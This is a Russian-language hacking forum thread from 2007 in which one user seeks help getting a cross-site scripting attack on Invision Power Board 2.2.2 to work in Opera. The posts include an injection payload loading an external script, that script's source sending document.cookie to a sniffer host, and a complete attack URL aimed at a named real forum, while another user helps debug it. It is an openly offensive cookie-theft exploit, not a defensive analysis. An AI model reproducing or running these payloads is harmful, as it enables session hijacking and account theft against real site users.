ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Xss в Ipb 2.2.2
  #1  
Старый 15.08.2007, 12:46
Аватар для Z0mbie!
Z0mbie!
Новичок
Регистрация: 14.08.2007
Сообщений: 10
Провел на форуме:
27258

Репутация: 1
По умолчанию Xss в Ipb 2.2.2

под Ie Xss пашед....НО под оперой нет,чо делать??!!
ктнить подскажет?
 
Ответить с цитированием

  #2  
Старый 15.08.2007, 12:47
Аватар для inv
inv
Banned
Регистрация: 03.08.2007
Сообщений: 313
Провел на форуме:
951141

Репутация: 291
По умолчанию

xss приведи с конкретным примером
 
Ответить с цитированием

  #3  
Старый 15.08.2007, 12:55
Аватар для Z0mbie!
Z0mbie!
Новичок
Регистрация: 14.08.2007
Сообщений: 10
Провел на форуме:
27258

Репутация: 1
По умолчанию

//--></script><SCRIPT SRC=http://ccp.on.ufanet.ru/cc.js></SCRIPT>
отправляет куки. не пашет. сниффер s.netsec.ru.

//--></script><SCRIPT SRC=http://ccp.on.ufanet.ru/al.js></SCRIPT>
просто выводит алерт.пашет.

исходник cc.js
document.location="http://s.netsec.ru/CCCP.gif?"+document.cookie;
 
Ответить с цитированием

  #4  
Старый 15.08.2007, 12:58
Аватар для inv
inv
Banned
Регистрация: 03.08.2007
Сообщений: 313
Провел на форуме:
951141

Репутация: 291
По умолчанию

конкретный пример это значит ссылка уязвимая сформированная тобой
 
Ответить с цитированием

  #5  
Старый 15.08.2007, 13:03
Аватар для Z0mbie!
Z0mbie!
Новичок
Регистрация: 14.08.2007
Сообщений: 10
Провел на форуме:
27258

Репутация: 1
По умолчанию

/jscripts/folder_rte_files/module_table.php?editorid=//--></
script><SCRIPT SRC=></SCRIPT>//--></script><SCRIPT SRC=http://ccp.on.ufanet.ru/cc.js></SCRIPT>
----------------------------------------------------
module_table.php?editorid= - уязвимый скрипт.

//--></
script><SCRIPT SRC=></SCRIPT>//--></script><SCRIPT SRC=http://ccp.on.ufanet.ru/cc.js></SCRIPT>
вызывает скрипт сс.js каторый вызывает
document.location="http://s.netsec.ru/CCCP.gif?"+document.cookie;
и все ето хрень корректно работает под ие,но не пашет под оперой.
хотя алерт оперра выводит.
 
Ответить с цитированием

  #6  
Старый 15.08.2007, 13:05
Аватар для inv
inv
Banned
Регистрация: 03.08.2007
Сообщений: 313
Провел на форуме:
951141

Репутация: 291
По умолчанию

Я тебя прошу дать ссылку чтобы я зашел по ней и посмотрел какой формируется код страницы ёмоё

в опере символы урлкодируются
 
Ответить с цитированием

  #7  
Старый 15.08.2007, 13:07
Аватар для Z0mbie!
Z0mbie!
Новичок
Регистрация: 14.08.2007
Сообщений: 10
Провел на форуме:
27258

Репутация: 1
По умолчанию

щас.

http://ufagames.ru/forums//jscripts/folder_rte_files/module_email.php?editorid=//--></script><SCRIPT SRC=http://ccp.on.ufanet.ru/cc.js></SCRIPT>
 
Ответить с цитированием

  #8  
Старый 15.08.2007, 13:12
Аватар для inv
inv
Banned
Регистрация: 03.08.2007
Сообщений: 313
Провел на форуме:
951141

Репутация: 291
По умолчанию

зашел в опере...кинуло на сниф,убери в совем скрипте передаресацию и просто сделай алерт(document.cookie)

проверь есть ли куки..
 
Ответить с цитированием

  #9  
Старый 15.08.2007, 13:18
Аватар для Z0mbie!
Z0mbie!
Новичок
Регистрация: 14.08.2007
Сообщений: 10
Провел на форуме:
27258

Репутация: 1
По умолчанию

есть. alert(document.cookie); работает норм.
 
Ответить с цитированием

  #10  
Старый 15.08.2007, 13:21
Аватар для inv
inv
Banned
Регистрация: 03.08.2007
Сообщений: 313
Провел на форуме:
951141

Репутация: 291
По умолчанию

в асю постучи так быстрее будет
4444107------------44
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss-туннелинг: твой трафик в Xss канале Mo4x Чужие Статьи 6 19.07.2007 16:13
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ